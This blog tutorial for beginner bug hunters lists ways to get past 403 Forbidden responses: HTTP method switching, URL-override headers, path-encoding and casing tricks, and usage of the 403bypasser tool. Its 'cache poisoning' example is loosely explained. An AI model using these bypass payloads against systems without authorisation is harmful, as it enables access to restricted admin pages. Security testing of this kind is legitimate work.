#14 Bypass — 403 Forbidden
Hello to all beginner Bug hunters. This is Uttam Gupta, today I have come with a topic from bypasses — 403 forbidden. A 403 Forbidden Error occurs when you do not have permission to access a web page or something else on a web server. Many times it happens that you are doing bug hunting on your target and while doing you go deep into the target, mostly I also get and you will also get 403 Forbidden or Permission Denied and then most beginners leave it. But if you can bypass it, then you can see most of the time target’s admin page or any trusted page and can do hunting on it. And you can also get bounty rewards by reporting it.
Today I will tell you some manual ways to bypass and also tell about a linux tool how to bypass automatically with its help. So, let's start.
Manually Bypass
Request Method Manipulation: Convert GET request to POST request.
GET /admin HTTP/1.1
Host: target.com
How to apply this
POST /admin HTTP/1.1
Host: target.com
Overriding the Target URL via Non-Standard Headers: X-Original-URL: & X-Rewrite-URL:
GET /admin HTTP/1.1
Host: target.com
How to apply this
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
Appending %2e after the first slash:
http://target.com/admin => 403
How to apply this
http://target.com/%2e/admin => 200
Try add dot (.) slash (/) and semicolon (;) in the URL:
http://target.com/admin => 403
How to apply this
http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
Add “..;/” after the directory name:
http://target.com/admin
How to apply this
http://target.com/admin..;/
Try to uppercase the alphabet in the URL:
http://target.com/admin
How to apply this
http://target.com/aDmIN
Via Web Cache Poisoning:
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
Automation Bypass
Tool: 403bypasser
Installation:
1. Clone the repository to your machine. git clone https://github.com/yunemse48/403bypasser.git
2. Install required modules by running the code pip install -r requirements.txt
Click on it for installation in Brief.
https://www.geeksforgeeks.org/403bypasser-bypass-403-restricted-directory/
Usage:
It is very easy to use it. Let’s see
After installation run this command
python3 403bypasser.py -u https://target.com -d xyz
In this command -u is for your targeted URL and -d is for the path which is showing you 403 forbidden and you want to bypass it like admin page, config.php, etc.
Now, Lets see with a live example
You will be able to see how this tool works. These tools do everything one by one — Request Method Manipulation, Path Manipulation, Overriding the Target URL via Non-Standard Headers and Other Headers & Values, etc.
I hope I must have taught you something new again. Thank You for reading this blog. HAVE A NICE DAY AND HAPPY HACKING.
P.S. I am looking for a job, my email is uttamgupta1802@gmail.com.